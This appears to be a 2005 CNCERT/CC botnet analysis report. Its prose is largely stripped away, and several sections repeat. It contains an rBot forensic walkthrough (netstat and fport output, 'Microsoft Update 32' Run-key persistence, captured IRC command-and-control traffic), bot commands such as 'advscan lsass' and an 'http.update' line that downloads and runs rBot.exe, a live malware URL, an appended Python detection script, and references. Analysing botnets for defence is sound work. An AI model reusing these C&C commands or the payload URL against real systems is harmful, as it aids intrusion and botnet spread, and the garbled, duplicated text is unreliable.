CNCERTCC bot

http://goa-irc.co.uk/wosten/rbot.exe 2005 7 9 9 rbot.exe

IP 10.0.0.1

sniffer

cmd.exe

c:\>netstat -an
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 10.0.0.1:1150 203.151.217.85:6667 ESTABLISHED
TCP 10.0.0.1:1616 202.108.32.137:445 FIN_WAIT_1
TCP 10.0.0.1:1631 202.108.32.147:445 FIN_WAIT_1
TCP 10.0.0.1:1714 202.108.32.190:445 FIN_WAIT_1
TCP 10.0.0.1:1727 202.108.32.165:445 FIN_WAIT_1
TCP 10.0.0.1:2253 202.108.34.211:445 TIME_WAIT
TCP 10.0.0.1:2904 202.108.37.91:445 TIME_WAIT
TCP 10.0.0.1:3476 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3478 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3480 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3486 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3487 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3488 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3673 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:3674 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:4953 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4955 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4959 202.108.45.23:445 TIME_WAIT
TCP 10.0.0.1:4961 202.108.45.23:445 TIME_WAIT
UDP 0.0.0.0:69 *:* (UDP 69)
UDP 0.0.0.0:445 *:*
UDP 10.0.0.1:137 *:*
UDP 10.0.0.1:138 *:*

fport.exe

C:\>fport | find "1150" (local port 1150, the connection to 6667)
1048 wininit -> 1150 TCP C:\WINNT\system32\wininit.exe

C:\>fport | find "69"
1048 wininit -> 69 UDP C:\WINNT\system32\wininit.exe

6667 69 wininit.exe rBot

wininit.exe Sysinternals FileMon

bot Sysinternals Autoruns

rBot

HKLM\Software\Microsoft\Windows\CurrentVersion\Run "Microsoft Update 32" wininit.exe

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices "Microsoft Update 32" wininit.exe

Wininit 445 6667

IP

203.151.217.85 6667

TCP

Wininit IRC

->NICK CHN|9148119\r\nUSER autdeoxsnv 0 0 :CHN|9148119\r\n ( )

->JOIN #xdcc dropit\r\n ( #xdcc dropit)

<-:CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 -b ( advscan asn1smb )

->PRIVMSG #xdcc :[SCAN]: Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0 min using 100 threads\r\n ( )

CNCERTCC 2005

[1] 2005.4

[2] Malicious Bots Hide Using Rootkit Code, Paul F. Roberts, May 17, 2005, http://www.eweek.com/article2/0,1759,1816972,00.asp

[3] Honeynet Project, "Know your Enemy: Tracking Botnets"

[4] Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks, Felix C. Freiling, Thorsten Holz and Georg Wicherski, http://www.honeynet.org/papers/individual

[5] Detecting Bots in Internet Relay Chat Systems, Jonas Bolliger, Thomas Kaufmann, www.tik.ee.ethz.ch/~ddosvax/sada/sa-2004-29/task.pdf

[6] Know your Enemy: Phishing, http://www.honeynet.org, 16th May 2005

[7] Shield: First-Line Worm Defense, Helen J. Wang, Chuanxiong Guo, Daniel R. Simon and Alf Zugenmaier, Microsoft Research, ACM SIGCOMM 2004

[8] http://www.mwcollect.org

[9] http://www.cert.org

[10] http://www.messagelab.co.uk

[11] Joe Stewart, "Emerging Threats: From Discovery to Protection", www.sdissa.org/downloads/emergingthreats-public.pdf

[12] http://www.ciphertrust.com/resources/statistics/zombie.php

[13] Lurhq Threat Intelligence Group, Phatbot Trojan Analysis, http://www.lurhq.com/phatbot.html

[14] Lurhq Threat Intelligence Group, Sinit P2P Trojan Analysis, http://www.lurhq.com/sinit.html

[15] http://www.symantec.com/press/index_2004.html

[16] Tom Vogt, Simulating and optimising worm propagation algorithms, www.securityfocus.com/guest/24046, 2003.9


3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 ... ServN

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1) advscan lsass 200 5 0 -r -s

(LSASS; 200 threads, 5 second delay, 0 min; -r = random, -s = silent)

2) http.update http://server/rBot.exe c:\rBot.exe 1

(server, rBot.exe, c:\, 1)

CNCERTCC TOPIC Bot

TOPIC "JOIN newchannel"

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

-> PRIVMSG rbot login password -s\n

IP

2 bot

<- :ControllerNICK!ControllerUSER@host PRIVMSG rbot :login password -s\r\n

1 2

IP Bot

host

IP

<- :ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG rbot :login password -s\r\n

10.10.10.10 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password -s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

-> PRIVMSG rbot :password accepted\n

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Gnutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

http://goa-irc.co.uk/wosten/rbot.exe 2005 7 9 9 rbot.exe

IP 10.0.0.1

sniffer

cmd.exe

C:\>netstat -an

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 10.0.0.1:1150 203.151.217.85:6667 ESTABLISHED
TCP 10.0.0.1:1616 202.108.32.137:445 FIN_WAIT_1
TCP 10.0.0.1:1631 202.108.32.147:445 FIN_WAIT_1
TCP 10.0.0.1:1714 202.108.32.190:445 FIN_WAIT_1
TCP 10.0.0.1:1727 202.108.32.165:445 FIN_WAIT_1
TCP 10.0.0.1:2253 202.108.34.211:445 TIME_WAIT
TCP 10.0.0.1:2904 202.108.37.91:445 TIME_WAIT
TCP 10.0.0.1:3476 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3478 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3480 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3486 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3487 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3488 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3673 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:3674 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:4953 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4955 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4959 202.108.45.23:445 TIME_WAIT
TCP 10.0.0.1:4961 202.108.45.23:445 TIME_WAIT
UDP 0.0.0.0:69 (UDP 69)
UDP 0.0.0.0:445
UDP 10.0.0.1:137
UDP 10.0.0.1:138

fport.exe

C:\>fport | find "1150"    (local port 1150, connected to 6667)
1048 wininit -> 1150 TCP C:\WINNT\system32\wininit.exe

C:\>fport | find "69"
1048 wininit -> 69 UDP C:\WINNT\system32\wininit.exe

6667 69 wininit.exe rBot

wininit.exe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLM\Software\Microsoft\Windows\CurrentVersion\Run  "Microsoft Update 32" = wininit.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices  "Microsoft Update 32" = wininit.exe

Wininit 445 6667

IP

203.151.217.85 6667

TCP

Wininit IRC

-> NICK CHN|9148119\r\nUSER autdeoxsnv 0 0 :CHN|9148119\r\n
-> JOIN #xdcc dropit\r\n    (join channel #xdcc with key dropit)
<- :CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :advscan asn1smb 100 5 0 b    (332 = RPL_TOPIC: the topic of #xdcc carries the command advscan asn1smb)
-> PRIVMSG #xdcc :[SCAN] Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0 min using 100 threads.\r\n
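The evidence the rBot analysis above relies on (the netstat -an listing, the fport attribution of local port 1150 to wininit.exe, the captured IRC session, and the controller login exchange described in section 3) rebuilt as detection logic a responder could run over the same kind of output. This is an added example, not code from the CNCERT/CC report: the netstat, fport and IRC sample lines are constructed to mirror the report's excerpt, and the IRC port range and the ten-host scan threshold are assumptions.

```python
# Added example (not from the CNCERT/CC report): the indicators from the rBot
# analysis expressed as detection logic over netstat, fport and IRC evidence.
import re

# Constructed netstat -an sample (shape of the listing in the analysis).
NETSTAT_SAMPLE = """\
  TCP    0.0.0.0:445       0.0.0.0:0             LISTENING
  TCP    10.0.0.1:1150     203.151.217.85:6667   ESTABLISHED
  TCP    10.0.0.1:1616     202.108.32.137:445    FIN_WAIT_1
  TCP    10.0.0.1:1631     202.108.32.147:445    FIN_WAIT_1
  TCP    10.0.0.1:1714     202.108.32.190:445    FIN_WAIT_1
  TCP    10.0.0.1:1727     202.108.32.165:445    FIN_WAIT_1
  TCP    10.0.0.1:2253     202.108.34.211:445    TIME_WAIT
  TCP    10.0.0.1:2904     202.108.37.91:445     TIME_WAIT
  TCP    10.0.0.1:3476     202.108.39.151:445    TIME_WAIT
  TCP    10.0.0.1:3478     202.108.39.153:445    TIME_WAIT
  TCP    10.0.0.1:3480     202.108.39.155:445    TIME_WAIT
  TCP    10.0.0.1:3673     202.108.40.82:445     TIME_WAIT
  UDP    0.0.0.0:69        *:*
"""
# Constructed fport sample: pid, process, port, proto, path.
FPORT_SAMPLE = "1048 wininit -> 1150 TCP C:\\WINNT\\system32\\wininit.exe\n"
# Constructed IRC session, rebuilt from the report's excerpt.
IRC_SAMPLE = [
    "NICK CHN|9148119",
    "USER autdeoxsnv 0 0 :CHN|9148119",
    "JOIN #xdcc dropit",
    ":CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :advscan asn1smb 100 5 0 b",
    "PRIVMSG #xdcc :[SCAN] Sequential Port Scan Started On 10.0.0.0:445 "
    "within a delay of 5 seconds for 0 min using 100 threads.",
    ":ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG rbot :login password -s",
]
IRC_PORTS = set(range(6660, 6670))  # assumption: classic IRC range incl. 6667
SCAN_HOST_THRESHOLD = 10            # assumption: distinct targets on one port
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\d+|\*)\s*(\S*)")
FPORT_RE = re.compile(r"^(\d+)\s+(\S+)\s+->\s+(\d+)\s+(TCP|UDP)\s+(.+)$")

def parse_netstat(text):
    """Turn netstat -an lines into dicts; non-matching lines are skipped."""
    conns = []
    for m in filter(None, map(NETSTAT_RE.match, text.splitlines())):
        proto, laddr, lport, raddr, rport, state = m.groups()
        conns.append({"proto": proto, "laddr": laddr, "lport": int(lport),
                      "raddr": raddr, "state": state,
                      "rport": None if rport == "*" else int(rport)})
    return conns

def parse_fport(text):
    """Map (proto, local port) -> executable path, as fport reports it."""
    owners = {}
    for m in filter(None, map(FPORT_RE.match, text.splitlines())):
        _pid, _name, port, proto, path = m.groups()
        owners[(proto, int(port))] = path.strip()
    return owners

def irc_connections(conns, owners):
    """Established TCP sessions to an IRC port, attributed to a local binary."""
    return [(c["raddr"], c["rport"], owners.get(("TCP", c["lport"])))
            for c in conns if c["proto"] == "TCP"
            and c["state"] == "ESTABLISHED" and c["rport"] in IRC_PORTS]

def scan_targets(conns, port=445):
    """Distinct remote hosts this machine opened TCP connections to on one port."""
    return sorted({c["raddr"] for c in conns
                   if c["proto"] == "TCP" and c["rport"] == port
                   and c["raddr"] != "0.0.0.0"})

def parse_irc(line):
    """Split an IRC line into (prefix, COMMAND, params) per RFC 1459 framing."""
    line, prefix = line.rstrip("\r\n"), None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    body, sep, trailing = line.partition(" :")
    params = body.split() + ([trailing] if sep else [])
    return (prefix, params[0].upper(), params[1:]) if params else (prefix, "", [])

def irc_indicators(lines):
    """Botnet traits: keyed JOIN, command in TOPIC (332), [SCAN] reports, login."""
    hits = []
    for prefix, cmd, params in map(parse_irc, lines):
        last = params[-1] if params else ""
        if cmd == "JOIN" and len(params) >= 2:
            hits.append(("JOIN", f"keyed channel {params[0]}"))
        elif cmd == "332" and "advscan" in last:
            hits.append(("TOPIC", f"scan command in topic of {params[1]}"))
        elif cmd == "PRIVMSG" and last.startswith("[SCAN]"):
            hits.append(("PRIVMSG", "scan status report"))
        elif cmd == "PRIVMSG" and last.split()[:1] == ["login"]:
            hits.append(("PRIVMSG", f"controller login from {prefix}"))
    return hits

if __name__ == "__main__":
    conns, owners = parse_netstat(NETSTAT_SAMPLE), parse_fport(FPORT_SAMPLE)
    for raddr, rport, exe in irc_connections(conns, owners):
        print(f"IRC session to {raddr}:{rport} owned by {exe}")
    targets = scan_targets(conns)
    if len(targets) >= SCAN_HOST_THRESHOLD:
        print(f"outbound scan of port 445: {len(targets)} distinct hosts")
    for kind, why in irc_indicators(IRC_SAMPLE):
        print(kind, why)
```

Run as a script it prints the three findings a responder would correlate: an established session to an IRC port owned by a binary that has no business talking IRC, a burst of short-lived outbound connections from one host to a single port (the SMB scan the [SCAN] message announces), and command text carried in the channel TOPIC so that every bot joining the channel picks it up without a separate instruction.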

CNCERTCC 2005

[1]

20054

[2] Paul F. Roberts, "Malicious Bots Hide Using Rootkit Code", May 17, 2005, http://www.eweek.com/article2/0,1759,1816972,00.asp

[3] Honeynet Project, "Know your Enemy: Tracking Botnets"

[4] Felix C. Freiling, Thorsten Holz and Georg Wicherski, "Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks", http://www.honeynet.org/papers/individual/

[5] Jonas Bolliger, Thomas Kaufmann, "Detecting Bots in Internet Relay Chat Systems", www.tik.ee.ethz.ch/~ddosvax/sada/sa-2004-29/task.pdf

[6] "Know your Enemy: Phishing", http://www.honeynet.org, 16th May 2005

[7] Helen J. Wang, Chuanxiong, Daniel R. Simon and Alf Zugenmaier, "Shield: First-Line Worm Defense", Microsoft Research, ACM SIGCOMM 2004

[8] http://www.mwcollect.org

[9] http://www.cert.org

[10] http://www.messagelab.co.uk

[11] Joe Stewart, "Emerging Threats: From Discovery to Protection", www.sdissa.org/downloads/emergingthreats-public.pdf

[12] http://www.ciphertrust.com/resources/statistics/zombie.php

[13] Lurhq Threat Intelligence Group, "Phatbot Trojan Analysis", http://www.lurhq.com/phatbot.html

[14] Lurhq Threat Intelligence Group, "Sinit P2P Trojan Analysis", http://www.lurhq.com/sinit.html

[15] http://www.symantec.com/press/index_2004.html

[16] Tom Vogt, "Simulating and optimising worm propagation algorithms", www.securityfocus.com/guest/24046, 2003.9
